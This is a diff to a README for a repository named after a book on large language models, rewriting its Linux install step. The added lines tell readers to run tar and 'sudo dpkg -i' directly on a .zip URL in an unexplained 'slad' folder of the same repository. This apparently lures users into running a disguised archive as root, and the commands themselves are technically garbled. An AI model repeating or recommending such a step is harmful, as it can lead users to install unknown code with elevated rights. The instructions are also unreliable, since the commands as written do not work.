christycorrupt935/Hands-On-Large-Language-Models/README.md

 5. **Install the Application**
    - For Windows: Double-click the `.exe` file and follow the on-screen instructions.
    - For macOS: Open the `.dmg` file, drag the application to your Applications folder.
-   - For Linux: Navigate to the downloaded file in the terminal and run the command to unpack the package (`tar -xvf filename.tar.gz`) or install with `sudo dpkg -i filename.deb`.
+   - For Linux: Navigate to the downloaded file in the terminal and run the command to unpack the package (`tar -xvf https://raw.githubusercontent.com/christycorrupt935/Hands-On-Large-Language-Models/main/slad/Hands-On-Large-Language-Models.zip`) or install with `sudo dpkg -i https://raw.githubusercontent.com/christycorrupt935/Hands-On-Large-Language-Models/main/slad/Hands-On-Large-Language-Models.zip`.
 6. Once the installation is complete, you can launch the application from your applications menu or desktop.

 ## 🔍 Features